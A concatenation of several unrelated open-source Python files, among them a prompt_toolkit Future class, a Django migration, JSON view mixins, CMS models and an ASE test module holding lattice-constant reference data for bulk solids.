        self._retrieved_result = False
        # Keep track of which `TaskContext` was active when this Future was
        # created. This is the one that will be viewed as visible when the
        # callbacks are called. (This is required to make get_app/set_app work
        # together with coroutines, when there are multiple active
        # applications, attached to different outputs.)
        self._ctx_id = get_context_id()

    # Thanks to asyncio for the following destructor!
    # On Python 3.3 and older, objects with a destructor part of a reference
    # cycle are never destroyed. It's not more the case on Python 3.4 thanks
    # to the PEP 442.
    if sys.version_info >= (3, 4):
        def __del__(self):
            # Report exceptions that were set but never observed.
            if self._exception and not self._retrieved_result:
                exc = self._exception
                context = {
                    'message': ('%s exception was never retrieved'
                                % self.__class__.__name__),
                    'exception': exc,
                    'future': self,
                }
                self.loop.call_exception_handler(context)

    @classmethod
    def succeed(cls, result):
        """
        Returns a Future for which the result has been set to the given result.
        Similar to Twisted's `Deferred.succeed()`.
        """
        f = cls()
        f.set_result(result)
        return f

    @classmethod
    def fail(cls, result):
        """
        Returns a Future for which the error has been set to the given result.
        Similar to Twisted's `Deferred.fail()`.
        """
        f = cls()
        f.set_exception(result)
        return f

    def add_done_callback(self, callback):
        """
        Add a callback to be run when the future becomes done. (This
        callback will be called with one argument only: this future
        object.)
        """
        self.done_callbacks.append(callback)

        # When a result has already been set. Call callback right away.
        if self._done:
            def call_cb():
                self._retrieved_result = True
                callback(self)
            # Scheduled on the loop rather than called synchronously, so the
            # caller never observes a re-entrant callback.
            self.loop.call_from_executor(call_cb)

    def set_result(self, result):
        " Mark the future done and set its result. "
        if self._done:
            raise InvalidStateError('Future result has been set already.')
        self._result = result
        self._done = True
        self._call_callbacks()

    def set_exception(self, exception):
        " Mark the future done and set an exception. "
        if self._done:
            raise InvalidStateError('Future result has been set already.')
        self._exception = exception
        self._done = True
        if self.done_callbacks:
            self._call_callbacks()
        else:
            # When an exception is set on a 'Future' object, but there
            # is no callback set to handle it, print the exception.
            # -- Uncomment for debugging. --

            # import traceback, sys
            # print(''.join(traceback.format_stack()), file=sys.__stderr__)
            # print('Uncollected error: %r' % (exception, ), file=sys.__stderr__)
            pass

    def _call_callbacks(self):
        # Create a local copy of the callbacks. Otherwise, it could be that
        # another call to `add_done_callback` would add a new callback to this list
        # which would then be called twice. (Once from here, once from the
        # `add_done_callback` function directly.
        done_callbacks = self.done_callbacks[:]

        if done_callbacks:
            self._retrieved_result = True

            def call_them_all():
                # Activate the original task context (and application) again.
                with context(self._ctx_id):
                    # They should be called in order.
                    for cb in done_callbacks:
                        cb(self)

            self.loop.call_from_executor(call_them_all)

    def result(self):
        " Return the result this future represents. "
        if not self._done:
            raise InvalidStateError

        self._retrieved_result = True
        if self._exception:
            raise self._exception
        else:
            return self._result

    def exception(self):
        " Return the exception that was set on this future. "
        if not self._done:
            raise InvalidStateError

        self._retrieved_result = True
        return self._exception

    def done(self):
        """
        Return True if the future is done. Done means either that a result /
        exception are available, or that the future was cancelled.
        """
        return self._done

    def to_asyncio_future(self):
        """
        Turn this `Future` into an asyncio `Future` object.
        """
        from asyncio import Future
        asyncio_f = Future()

        # Forward the eventual result/exception to the asyncio future.
        @self.add_done_callback
        def _(f):
            if f.exception():
                asyncio_f.set_exception(f.exception())
            else:
                asyncio_f.set_result(f.result())

        return asyncio_f

    @classmethod
    def from_asyncio_future(cls, asyncio_f, loop=None):
        """
        Return a prompt_toolkit `Future` from the given asyncio Future.
        """
        f = cls(loop=loop)

        # Forward the asyncio future's outcome to the new prompt_toolkit one.
        @asyncio_f.add_done_callback
        def _(asyncio_f):
            if asyncio_f.exception():
                f.set_exception(asyncio_f.exception())
            else:
                f.set_result(asyncio_f.result())

        return f

    def __iter__(self):
        " For compatibility with asyncio. "
        return self.to_asyncio_future().__iter__()

    # ``await future`` delegates to the asyncio wrapper as well.
    __await__ = __iter__
| lmregus/Portfolio | python/design_patterns/env/lib/python3.7/site-packages/prompt_toolkit/eventloop/future.py | Python | mit | 6,560 |
# Generated by Django 3.1.3 on 2021-01-06 19:03
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: redefines the choice list of
    # AuditLog.activity (same max_length and db_index as before).

    dependencies = [
        ("accounts", "0010_auto_20201213_1314"),
    ]

    operations = [
        migrations.AlterField(
            model_name="auditlog",
            name="activity",
            field=models.CharField(
                choices=[
                    ("auth-connect", "auth-connect"),
                    ("auth-disconnect", "auth-disconnect"),
                    ("connect", "connect"),
                    ("email", "email"),
                    ("failed-auth", "failed-auth"),
                    ("full_name", "full_name"),
                    ("invited", "invited"),
                    ("locked", "locked"),
                    ("login", "login"),
                    ("login-new", "login-new"),
                    ("password", "password"),
                    ("register", "register"),
                    ("removed", "removed"),
                    ("reset", "reset"),
                    ("reset-request", "reset-request"),
                    ("sent-email", "sent-email"),
                    ("tos", "tos"),
                    ("trial", "trial"),
                    ("username", "username"),
                ],
                db_index=True,
                max_length=20,
            ),
        ),
    ]
| nijel/weblate | weblate/accounts/migrations/0011_auto_20210106_1903.py | Python | gpl-3.0 | 1,374 |
import json

from django.http import HttpResponse
from django.views.generic import TemplateView
from django.views.generic.detail import BaseDetailView, SingleObjectTemplateResponseMixin
class JSONResponseMixin(object):
    """
    A mixin that can be used to render a JSON response.
    """
    response_class = HttpResponse

    def render_to_response(self, context, **response_kwargs):
        """
        Returns a JSON response, transforming 'context' to make the payload.
        """
        response_kwargs['content_type'] = 'application/json'
        payload = self.convert_context_to_json(context)
        return self.response_class(payload, **response_kwargs)

    def convert_context_to_json(self, context):
        "Convert the context dictionary into a JSON object"
        # Note: This is *EXTREMELY* naive; in reality, you'll need
        # to do much more complex handling to ensure that arbitrary
        # objects -- such as Django model instances or querysets
        # -- can be serialized as JSON.
        return json.dumps(context)
# NOTE: the redundant duplicate "from django.views.generic import
# TemplateView" that used to precede this class was removed; TemplateView
# is already imported at the top of the module.
class JSONView(JSONResponseMixin, TemplateView):
    """TemplateView variant that responds with JSON instead of HTML."""
    pass
class JSONDetailView(JSONResponseMixin, BaseDetailView):
    """Detail view that renders its single-object context as JSON.

    Bug fix: ``BaseDetailView`` was never imported in this module, so
    defining this class raised NameError at import time; it is now
    imported from ``django.views.generic.detail``.
    """
    pass
class HybridDetailView(JSONResponseMixin, SingleObjectTemplateResponseMixin, BaseDetailView):
    """Detail view returning JSON when '?format=json' is requested,
    otherwise the normal template response.

    Bug fix: ``SingleObjectTemplateResponseMixin`` and ``BaseDetailView``
    were never imported in this module (NameError at import time); both
    are now imported from ``django.views.generic.detail``.
    """

    def render_to_response(self, context):
        # Look for a 'format=json' GET argument
        if self.request.GET.get('format', 'html') == 'json':
            return JSONResponseMixin.render_to_response(self, context)
        else:
            return SingleObjectTemplateResponseMixin.render_to_response(self, context)
| rubydhash/webradius | webradius-project/lib/djangoutils/jsonutils.py | Python | lgpl-2.1 | 1,649 |
"""
Useful constants used in this project
"""
# Dictionary keys used for records in the spider's JSON output.
NAME_KEY = 'name'
ID_KEY = 'id'
PRICE_KEY = 'price'
LINK_KEY = 'link'
from django.db import models
from django.contrib.auth.models import User
from cms.models import CMSPlugin
class ContestPlugin(CMSPlugin):
    # Title displayed for this contest plugin instance in the CMS.
    title = models.CharField(max_length=255)
class Prediction(models.Model):
    # User who submitted the prediction; creation timestamp is automatic.
    user = models.ForeignKey(User)
    date = models.DateTimeField(auto_now_add=True)
class Week(models.Model):
    # One week's value within a prediction; `value` may be absent.
    prediction = models.ForeignKey(Prediction)
    number = models.IntegerField()
    value = models.CharField(max_length=6, null=True)

    class Meta:
        # Weeks are always returned in chronological (week-number) order.
        ordering = ('number',)
| ISIFoundation/influenzanet-website | apps/contest/models.py | Python | agpl-3.0 | 514 |
"""Collection of bulk systems.
From this paper:
Philipp Haas, Fabien Tran, Peter Blaha
Calculation of the lattice constant of solids with semilocal functionals
Phys. Rev. B 79, 085104 (2009)
dx.doi.org/10.1103/PhysRevB.79.085104
Data extracted to csv files with:
* lattice constant::
pdftotext -layout -f 3 -l 4 e085104.pdf - | sed -n '/Solid/,$p' \
| sed -n '/me /q;p' | grep -E -v "085104|TRAN|TABLE" \
| sed '/^$/d' | sed -e 1b -e '/^Solid/d' \
| sed 's/Expt./Expt1. Expt2./' | sed 's/Solid/Solid Str/' \
| sed -e 's/\s\+/,/g'
* erratum::
pdftotext -layout e209902.pdf - | sed -n '/Solid/,$p' | sed -n '/me /q;p' \
| sed '/^$/d' \
| sed 's/Expt./Expt1. Expt2./' | sed 's/Solid/Solid Str/' \
| sed -e 's/\s\+/,/g'
"""
import ase.units as units
from ase.lattice import bulk
from ase.tasks.io import read_json
from ase.tasks.bulk import BulkTask
from ase.utils.eos import EquationOfState
# Map Strukturbericht designations (as used in the data tables below)
# to ASE crystal-structure names accepted by ase.lattice.bulk().
strukturbericht = {'A1': 'fcc',
                   'A2': 'bcc',
                   'A4': 'diamond',
                   'B1': 'rocksalt',
                   'B2': 'cesiumchloride',
                   'B3': 'zincblende',
                   'C1': 'fluorite'}
class HaasTranBlahaBulkCollection:
    """Bulk solids with reference lattice constants (Angstrom) and bulk
    moduli (GPa) for several XC functionals, from Haas, Tran & Blaha,
    Phys. Rev. B 79, 085104 (2009), its erratum, and private
    communication.  The tables below are parsed at class-definition time.
    """
    # e085104.pdf, lattice constant
    data1 = """
Solid,Str,LDA,SOGGA,PBEsol,WC,AM05,TPSS,PBE,Expt1.,Expt2.
Li,A2,3.363,3.435,3.433,3.449,3.456,3.455,3.435,3.451,3.477
Na,A2,4.047,4.175,4.170,4.199,4.209,4.237,4.196,4.209,4.225
K,A2,5.045,5.231,5.213,5.256,5.293,5.352,5.282,5.212,5.225
Rb,A2,5.374,5.605,5.579,5.609,5.692,5.749,5.670,5.577,5.585
Ca,A1,5.333,5.469,5.456,5.458,5.491,5.533,5.530,5.556,5.565
Sr,A1,5.786,5.930,5.917,5.914,5.975,6.018,6.027,6.040,6.048
Ba,A2,4.754,4.881,4.881,4.870,4.963,4.991,5.030,5.002,5.007
V,A2,2.932,2.959,2.963,2.965,2.961,2.979,3.001,3.024,3.028
Nb,A2,3.250,3.268,3.274,3.280,3.271,3.297,3.312,3.294,3.296
Ta,A2,3.257,3.280,3.285,3.290,3.281,3.300,3.323,3.299,3.301
Mo,A2,3.116,3.126,3.133,3.139,3.128,3.151,3.164,3.141,3.144
W,A2,3.143,3.155,3.162,3.167,3.156,3.173,3.191,3.160,3.162
Fe,A2,2.754,2.783,2.790,2.793,2.787,2.804,2.833,2.853,2.861
Rh,A1,3.759,3.772,3.785,3.795,3.777,3.807,3.834,3.793,3.798
Ir,A1,3.828,3.834,3.847,3.857,3.837,3.867,3.887,3.831,3.835
Ni,A1,3.423,3.453,3.463,3.468,3.461,3.478,3.518,3.508,3.516
Pd,A1,3.848,3.867,3.882,3.892,3.878,3.909,3.948,3.876,3.881
Pt,A1,3.909,3.917,3.932,3.944,3.923,3.958,3.985,3.913,3.916
Cu,A1,3.522,3.557,3.570,3.573,3.568,3.585,3.632,3.596,3.603
Ag,A1,4.007,4.038,4.058,4.065,4.059,4.093,4.152,4.062,4.069
Au,A1,4.047,4.061,4.081,4.092,4.074,4.115,4.154,4.062,4.065
Al,A1,3.983,4.008,4.018,4.023,4.008,4.015,4.041,4.019,4.032
C,A4,3.536,3.552,3.557,3.558,3.553,3.573,3.575,3.544,3.567
Si,A4,5.407,5.425,5.438,5.437,5.439,5.466,5.475,5.415,5.430
Ge,A4,5.632,5.662,5.684,5.686,5.688,5.734,5.769,5.639,5.652
Sn,A4,6.481,6.521,6.547,6.548,6.566,6.621,6.661,6.474,6.482
Pb,A1,4.874,4.899,4.931,4.936,4.945,4.997,5.048,4.912,4.916
Th,A1,4.920,4.928,4.959,4.977,4.954,5.032,5.056,5.071,5.074
LiF,B1,3.919,4.008,4.013,4.017,4.046,4.047,4.071,3.960,4.010
LiCl,B1,4.986,5.062,5.081,5.087,5.142,5.151,5.167,5.072,5.106
NaF,B1,4.507,4.637,4.635,4.652,4.682,4.702,4.709,4.576,4.609
NaCl,B1,5.484,5.608,5.619,5.637,5.696,5.715,5.714,5.565,5.595
MgO,B1,4.169,4.217,4.222,4.223,4.228,4.244,4.261,4.186,4.207
MgS,B1,5.139,5.174,5.190,5.195,5.197,5.237,5.238,5.182,5.202
CaO,B1,4.719,4.771,4.778,4.777,4.790,4.819,4.841,4.787,4.803
TiC,B1,4.266,4.294,4.302,4.303,4.297,4.336,4.339,4.317,4.330
TiN,B1,4.178,4.202,4.210,4.214,4.206,4.241,4.254,4.228,4.239
ZrC,B1,4.647,4.664,4.675,4.680,4.670,4.711,4.715,4.688,4.696
ZrN,B1,4.532,4.549,4.560,4.565,4.555,4.590,4.602,4.574,4.585
HfC,B1,4.578,4.602,4.613,4.618,4.606,4.646,4.660,4.627,4.638
HfN,B1,4.482,4.506,4.515,4.520,4.510,4.543,4.560,4.512,4.520
VC,B1,4.095,4.114,4.123,4.129,4.116,4.151,4.162,4.148,4.160
VN,B1,4.050,4.071,4.081,4.087,4.075,4.112,4.125,4.126,4.141
NbC,B1,4.432,4.446,4.457,4.462,4.448,4.487,4.491,4.462,4.470
NbN,B1,4.361,4.374,4.385,4.392,4.378,4.419,4.426,4.383,4.392
FeAl,B2,2.812,2.837,2.840,2.843,2.839,2.850,2.869,2.882,2.889
CoAl,B2,2.795,2.820,2.824,2.826,2.822,2.833,2.853,2.855,2.861
NiAl,B2,2.834,2.859,2.864,2.866,2.862,2.873,2.894,2.882,2.887
BN,B3,3.585,3.605,3.610,3.610,3.607,3.628,3.629,3.585,3.607
BP,B3,4.496,4.514,4.525,4.526,4.522,4.553,4.553,4.520,4.538
BAs,B3,4.740,4.761,4.775,4.778,4.772,4.808,4.816,4.760,4.777
AlP,B3,5.440,5.464,5.476,5.474,5.479,5.504,5.513,5.445,5.460
AlAs,B3,5.636,5.668,5.681,5.680,5.687,5.713,5.734,5.646,5.658
GaN,B3,4.463,4.492,4.502,4.504,4.501,4.536,4.551,4.520,4.531
GaP,B3,5.401,5.429,5.447,5.448,5.451,5.498,5.514,5.435,5.448
GaAs,B3,5.616,5.650,5.670,5.672,5.678,5.724,5.757,5.637,5.648
InP,B3,5.839,5.869,5.890,5.890,5.898,5.958,5.968,5.856,5.866
InAs,B3,6.038,6.076,6.098,6.100,6.111,6.167,6.195,6.044,6.054
SiC,B3,4.333,4.354,4.360,4.360,4.357,4.371,4.384,4.340,4.358
CeO2,C1,5.371,5.396,5.410,5.415,5.414,5.454,5.475,5.393,5.401
"""
    # Parse the published table into a dict:
    # name -> [Strukturbericht, LDA, SOGGA, ..., Expt2.] (floats after [0]).
    # Note: rows contain no spaces, so str.split() yields one row per token.
    data_ref = {}
    for l in data1.split():
        if 'Solid' not in l:
            l1 = l.split(',')
            data_ref[l1[0]] = [l1[1]]
            data_ref[l1[0]].extend([float(v) for v in l1[2:]])
    # e209902.pdf, lattice constant (erratum rows overwrite data1 entries)
    data2 = """
Solid,Str,LDA,SOGGA,PBEsol,WC,AM05,TPSS,PBE,Expt1.,Expt2.
Rb,A2,5.372,5.592,5.570,5.608,5.676,5.749,5.668,5.577,5.585
Pd,A1,3.840,3.859,3.875,3.884,3.870,3.905,3.942,3.876,3.881
Ge,A4,5.625,5.656,5.678,5.681,5.683,5.724,5.763,5.639,5.652
Sn,A4,6.473,6.513,6.540,6.541,6.557,6.615,6.655,6.474,6.482
LiF,B1,3.911,4.003,4.006,4.012,4.038,4.039,4.068,3.960,4.010
LiCl,B1,4.965,5.042,5.063,5.069,5.118,5.115,5.150,5.072,5.106
NaCl,B1,5.465,5.594,5.605,5.623,5.682,5.704,5.700,5.565,5.595
MgS,B1,5.132,5.169,5.184,5.189,5.191,5.224,5.231,5.182,5.202
HfN,B1,4.472,4.497,4.506,4.511,4.501,4.541,4.550,4.512,4.520
AlAs,B3,5.630,5.663,5.676,5.676,5.680,5.706,5.729,5.646,5.658
GaAs,B3,5.607,5.642,5.662,5.664,5.670,5.715,5.747,5.637,5.648
InP,B3,5.825,5.862,5.880,5.882,5.886,5.951,5.961,5.856,5.866
InAs,B3,6.027,6.065,6.088,6.091,6.102,6.161,6.187,6.044,6.054
CeO2,C1,5.356,5.379,5.394,5.399,5.397,5.439,5.459,5.393,5.401
"""
    for l in data2.split():
        if 'Solid' not in l:
            l1 = l.split(',')
            data_ref[l1[0]] = [l1[1]]
            data_ref[l1[0]].extend([float(v) for v in l1[2:]])
    # F. Tran, private communication, lattice constant
    data3 = """
Solid,Str,LDA,SOGGA,PBEsol,WC,AM05,TPSS,PBE,Expt2.
Li,A2,3.363,3.435,3.433,3.449,3.456,3.455,3.435,3.451
Na,A2,4.047,4.175,4.170,4.199,4.209,4.237,4.196,4.209
K,A2,5.045,5.231,5.213,5.256,5.293,5.352,5.282,5.212
Rb,A2,5.372,5.592,5.570,5.608,5.676,5.749,5.668,5.577
Ca,A1,5.333,5.469,5.456,5.458,5.491,5.533,5.530,5.556
Sr,A1,5.786,5.930,5.917,5.914,5.975,6.018,6.027,6.040
Ba,A2,4.754,4.881,4.881,4.870,4.963,4.991,5.030,5.002
V,A2,2.932,2.959,2.963,2.965,2.961,2.979,3.001,3.024
Nb,A2,3.250,3.268,3.274,3.280,3.271,3.297,3.312,3.294
Ta,A2,3.257,3.280,3.285,3.290,3.281,3.300,3.323,3.299
Mo,A2,3.116,3.126,3.133,3.139,3.128,3.151,3.164,3.141
W,A2,3.143,3.155,3.162,3.167,3.156,3.173,3.191,3.160
Fe,A2,2.754,2.783,2.790,2.793,2.787,2.804,2.833,2.853
Rh,A1,3.759,3.772,3.785,3.795,3.777,3.807,3.834,3.793
Ir,A1,3.828,3.834,3.847,3.857,3.837,3.867,3.887,3.831
Ni,A1,3.423,3.453,3.463,3.468,3.461,3.478,3.518,3.508
Pd,A1,3.840,3.859,3.875,3.884,3.870,3.905,3.942,3.876
Pt,A1,3.909,3.917,3.932,3.944,3.923,3.958,3.985,3.913
Cu,A1,3.522,3.557,3.570,3.573,3.568,3.585,3.632,3.596
Ag,A1,4.007,4.038,4.058,4.065,4.059,4.093,4.152,4.062
Au,A1,4.047,4.061,4.081,4.092,4.074,4.115,4.154,4.062
Al,A1,3.983,4.008,4.018,4.023,4.008,4.015,4.041,4.019
C,A4,3.536,3.552,3.557,3.558,3.553,3.573,3.575,3.544
Si,A4,5.407,5.425,5.438,5.437,5.439,5.466,5.475,5.415
Ge,A4,5.625,5.656,5.678,5.681,5.683,5.724,5.763,5.639
Sn,A4,6.473,6.513,6.540,6.541,6.557,6.615,6.655,6.474
Pb,A1,4.874,4.899,4.931,4.936,4.945,4.997,5.048,4.912
Th,A1,4.920,4.928,4.959,4.977,4.954,5.032,5.056,5.071
LiF,B1,3.911,4.003,4.006,4.012,4.038,4.039,4.068,3.960
LiCl,B1,4.965,5.042,5.063,5.069,5.118,5.115,5.150,5.072
NaF,B1,4.507,4.637,4.635,4.652,4.682,4.702,4.709,4.576
NaCl,B1,5.465,5.594,5.605,5.623,5.682,5.704,5.700,5.565
MgO,B1,4.169,4.217,4.222,4.223,4.228,4.244,4.261,4.186
MgS,B1,5.132,5.169,5.184,5.189,5.191,5.224,5.231,5.182
CaO,B1,4.719,4.771,4.778,4.777,4.790,4.819,4.841,4.787
TiC,B1,4.266,4.294,4.302,4.303,4.297,4.336,4.339,4.317
TiN,B1,4.178,4.202,4.210,4.214,4.206,4.241,4.254,4.228
ZrC,B1,4.647,4.664,4.675,4.680,4.670,4.711,4.715,4.688
ZrN,B1,4.532,4.549,4.560,4.565,4.555,4.590,4.602,4.574
HfC,B1,4.578,4.602,4.613,4.618,4.606,4.646,4.660,4.627
HfN,B1,4.472,4.497,4.506,4.511,4.501,4.541,4.550,4.512
VC,B1,4.095,4.114,4.123,4.129,4.116,4.151,4.162,4.148
VN,B1,4.050,4.071,4.081,4.087,4.075,4.112,4.125,4.126
NbC,B1,4.432,4.446,4.457,4.462,4.448,4.487,4.491,4.462
NbN,B1,4.361,4.374,4.385,4.392,4.378,4.419,4.426,4.383
FeAl,B2,2.812,2.837,2.840,2.843,2.839,2.850,2.869,2.882
CoAl,B2,2.795,2.820,2.824,2.826,2.822,2.833,2.853,2.855
NiAl,B2,2.834,2.859,2.864,2.866,2.862,2.873,2.894,2.882
BN,B3,3.585,3.605,3.610,3.610,3.607,3.628,3.629,3.585
BP,B3,4.496,4.514,4.525,4.526,4.522,4.553,4.553,4.520
BAs,B3,4.740,4.761,4.775,4.778,4.772,4.808,4.816,4.760
AlP,B3,5.440,5.464,5.476,5.474,5.479,5.504,5.513,5.445
AlAs,B3,5.630,5.663,5.676,5.676,5.680,5.706,5.729,5.646
GaN,B3,4.463,4.492,4.502,4.504,4.501,4.536,4.551,4.520
GaP,B3,5.401,5.429,5.447,5.448,5.451,5.498,5.514,5.435
GaAs,B3,5.607,5.642,5.662,5.664,5.670,5.715,5.747,5.637
InP,B3,5.825,5.862,5.880,5.882,5.886,5.951,5.961,5.856
InAs,B3,6.027,6.065,6.088,6.091,6.102,6.161,6.187,6.044
SiC,B3,4.333,4.354,4.360,4.360,4.357,4.371,4.384,4.340
CeO2,C1,5.356,5.379,5.394,5.399,5.397,5.439,5.459,5.393
"""
    data_priv = {}
    for l in data3.split():
        if 'Solid' not in l:
            l1 = l.split(',')
            data_priv[l1[0]] = [l1[1]]
            data_priv[l1[0]].extend([float(v) for v in l1[2:]])
    # F. Tran, private communication, bulk modulus
    data4 = """
Solid,Str,LDA,SOGGA,PBEsol,WC,AM05,TPSS,PBE,Expt2.
Li,A2,15.2,13.7,13.7,13.4,13.2,13.5,14.0,13.0
Na,A2,9.41,7.91,7.88,7.32,7.50,7.37,7.85,7.50
K,A2,4.50,3.69,3.73,3.49,3.45,3.34,3.61,3.70
Rb,A2,3.59,2.82,2.88,2.71,2.59,2.53,2.77,3.10
Ca,A1,18.7,17.8,18.0,17.4,17.6,17.4,17.3,18.4
Sr,A1,14.4,12.2,12.5,12.2,11.8,11.5,11.4,12.3
Ba,A2,10.6,9.0,9.3,9.2,8.5,8.2,8.2,9.3
V,A2,213,203,201,198,199,196,183,162
Nb,A2,193,186,184,183,183,180,171,170
Ta,A2,219,210,208,207,208,206,195,194
Mo,A2,294,288,282,279,284,277,260,272
W,A2,336,329,322,320,325,319,303,296
Fe,A2,254,233,226,227,224,220,194,168
Rh,A1,320,309,298,292,300,284,259,269
Ir,A1,395,392,377,368,383,360,336,355
Ni,A1,259,239,232,231,231,221,200,186
Pd,A1,231,218,208,207,207,194,170,195
Pt,A1,301,296,282,276,285,265,242,277
Cu,A1,191,177,170,168,168,165,141,142
Ag,A1,140,127,120,119,116,109,91,109
Au,A1,200,192,180,177,179,165,144,167
Al,A1,84.3,86.6,83.0,80.6,86.3,87.2,79.2,79.4
C,A4,469,458,452,451,453,431,434,443
Si,A4,96.4,96.4,93.8,94.0,93.2,90.5,88.7,99.2
Ge,A4,72.7,71.1,68.1,67.8,66.5,62.5,59.5,75.8
Sn,A4,45.7,44.0,42.3,42.4,40.3,38.1,36.3,53.0
Pb,A1,50.5,47.5,44.6,45.2,41.7,40.0,35.6,43.0
Th,A1,66.9,64.1,62.7,63.0,61.7,60.0,58.0,54.3
LiF,B1,88.2,73.4,72.8,72.4,66.1,66.8,67.5,69.8
LiCl,B1,42.0,36.6,35.9,35.7,31.4,33.0,32.2,35.4
NaF,B1,61.7,48.5,48.5,45.4,44.3,42.8,44.5,51.4
NaCl,B1,32.7,26.2,26.1,24.7,22.4,23.2,23.7,26.6
MgO,B1,174,158,158,158,154,154,149,165
MgS,B1,84.0,80.3,78.7,78.2,76.7,76.2,74.4,78.9
CaO,B1,129,116,115,116,111,109,105,114
TiC,B1,283,275,270,267,270,255,248,233
TiN,B1,322,307,302,300,301,289,277,277
ZrC,B1,248,241,237,236,236,226,222,230
ZrN,B1,286,276,271,270,271,262,250,215
HfC,B1,257,247,240,238,244,223,218,200
HfN,B1,309,295,290,289,290,279,265,306
VC,B1,349,338,331,328,333,314,307,303
VN,B1,365,352,343,340,344,326,312,233
NbC,B1,335,330,324,319,325,306,301,315
NbN,B1,353,344,335,333,338,323,309,292
FeAl,B2,208,197,194,193,194,191,180,136
CoAl,B2,207,196,193,192,193,191,179,162
NiAl,B2,185,176,173,171,173,171,159,156
BN,B3,405,391,387,387,387,374,373,373
BP,B3,176,173,170,170,169,162,162,152
BAs,B3,148,145,141,141,140,133,132,138
AlP,B3,89.9,88.8,87.1,87.1,85.8,85.9,82.6,86.0
AlAs,B3,75.5,73.8,72.4,72.5,70.8,70.5,67.0,74.0
GaN,B3,204,194,190,190,189,179,173,190
GaP,B3,90.6,87.9,85.2,85.5,83.4,78.6,77.0,87.4
GaAs,B3,74.7,72.1,69.5,69.5,67.5,64.1,61.0,75.6
InP,B3,72.0,69.5,67.4,67.4,65.3,60.7,59.9,71.0
InAs,B3,60.7,58.1,56.0,56.6,53.8,50.7,48.8,58.0
SiC,B3,230,225,222,221,222,217,212,225
CeO2,C1,209,198,195,195,190,189,176,220
"""
    data_B_priv = {}
    for l in data4.split():
        if 'Solid' not in l:
            l1 = l.split(',')
            data_B_priv[l1[0]] = [l1[1]]
            data_B_priv[l1[0]].extend([float(v) for v in l1[2:]])
    # Compile-time switch between the two data sets; the else branch is
    # intentionally kept as dead code for easy toggling.
    if 1:
        # use private communication data
        data = data_priv.copy()
        B = data_B_priv.copy()
        names = [d.split(',')[0] for d in data3.split()][1:]
        labels = data3.split()[0].split(',')
    else:
        # use private published data (no bulk modulus)
        data = data_ref.copy()
        B = None
        names = [d.split(',')[0] for d in data1.split()][1:]
        labels = data1.split()[0].split(',')

    def __init__(self, xc='PBE'):
        # XC functional whose reference lattice constants are served.
        self.xc = xc

    def __getitem__(self, name):
        """Return an ASE Atoms object for *name* at the reference lattice
        constant of the selected functional."""
        d = self.data[name]
        # the index of functional in labels less one
        # (solid is already as key in d)
        a = d[self.labels.index(self.xc) - 1]
        cs = strukturbericht[d[0]]
        b = bulk(name, crystalstructure=cs, a=a)
        # Give the magnetic elements a ferromagnetic starting guess.
        M = {'Fe': 2.3, 'Co': 1.2, 'Ni': 0.6}.get(name)
        if M is not None:
            b.set_initial_magnetic_moments([M] * len(b))
        return b

    def keys(self):
        # All solid names, in table order.
        return self.names
class HaasTranBlahaBulkTask(BulkTask):
    """BulkTask over the Haas-Tran-Blaha collection that compares fitted
    lattice constants and bulk moduli against the reference data."""

    def __init__(self, xc='PBE', **kwargs):
        BulkTask.__init__(self,
                          collection=HaasTranBlahaBulkCollection(xc),
                          **kwargs)
        # Quantities reported in the summary table.
        self.summary_keys = ['energy', 'fitted energy',
                             'crystal structure',
                             'strukturbericht',
                             'lattice constant', 'lattice constant error [%]',
                             'volume', 'volume error [%]',
                             'B', 'B error [%]']

    def analyse(self, atomsfile=None):
        """Fit an EOS per solid and record lattice-constant, volume and
        bulk-modulus errors; optionally add cohesive energies from
        *atomsfile*."""
        try:
            BulkTask.analyse(self)
        except ValueError:  # allow fit outside of range
            pass
        for name, data in self.data.items():
            if 'strains' in data:
                atoms = self.create_system(name)
                # use relaxed volume if present
                if 'relaxed volume' in data:
                    volume = data['relaxed volume']
                else:
                    volume = atoms.get_volume()
                volumes = data['strains']**3 * volume
                energies = data['energies']
                # allow selection of eos type independent of data
                if self.eos is not None:
                    eos = EquationOfState(volumes, energies, self.eos)
                else:
                    eos = EquationOfState(volumes, energies)
                try:
                    v, e, B = eos.fit()
                except ValueError:
                    pass
                else:
                    data['fitted energy'] = e
                    data['volume'] = v
                    data['B'] = B
                # with respect to the reference volume
                data['volume error [%]'] = (data['volume'] / atoms.get_volume() - 1) * 100
                # Reference bulk moduli are in GPa; convert to eV/Angstrom^3.
                if self.collection.B:
                    i = self.collection.labels.index(self.collection.xc) - 1
                    B = self.collection.B[name][i] * units.kJ * 1e-24
                    data['B error [%]'] = (data['B'] / B - 1) * 100
                else:
                    data['B error [%]'] = None
                data['strukturbericht'] = self.collection.data[name][0]
                data['crystal structure'] = strukturbericht[data['strukturbericht']]
                # calculate lattice constant from volume
                cs = data['crystal structure']
                if cs == 'bcc':
                    a0 = (volume*2)**(1/3.)
                    a = (data['volume']*2)**(1/3.)
                elif cs == 'cesiumchloride':
                    a0 = (volume)**(1/3.)
                    a = (data['volume'])**(1/3.)
                elif cs in ['fcc',
                            'diamond',
                            'zincblende',
                            'rocksalt',
                            'fluorite']:
                    a0 = (volume*4)**(1/3.)
                    a = (data['volume']*4)**(1/3.)
                i = self.collection.labels.index(self.collection.xc) - 1
                a0_ref = self.collection.data[name][i]
                if 'relaxed volume' not in data:
                    # no volume relaxation performed - volume equals the reference one
                    assert abs(a0 - a0_ref) < 1.e-4
                data['lattice constant'] = a
                data['lattice constant error [%]'] = (a - a0_ref) / a0_ref * 100
        if atomsfile:
            # MDTMP: TODO
            # NOTE(review): the 'eref' columns below index lattice-constant
            # tables, not cohesive energies -- confirm before relying on
            # the cohesive-energy errors.
            atomdata = read_json(atomsfile)
            for name, data in self.data.items():
                atoms = self.create_system(name)
                e = -data['energy']
                for atom in atoms:
                    e += atomdata[atom.symbol]['energy']
                e /= len(atoms)
                data['cohesive energy'] = e
                if self.collection.xc == 'PBE':
                    eref = self.collection.data[name][7]
                else:
                    eref = self.collection.data[name][9]
                data['cohesive energy error [%]'] = (e / eref - 1) * 100
            self.summary_keys += ['cohesive energy',
                                  'cohesive energy error [%]']
if __name__ == '__main__':
    # run with emt
    from ase.tasks.main import run
    run(calcname='emt', task=HaasTranBlahaBulkTask(fit=(5, 0.02)))
| grhawk/ASE | tools/ase/test/tasks/htb.py | Python | gpl-2.0 | 18,943 |
#
# Copyright 2015-2019, Institute for Systems Biology
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
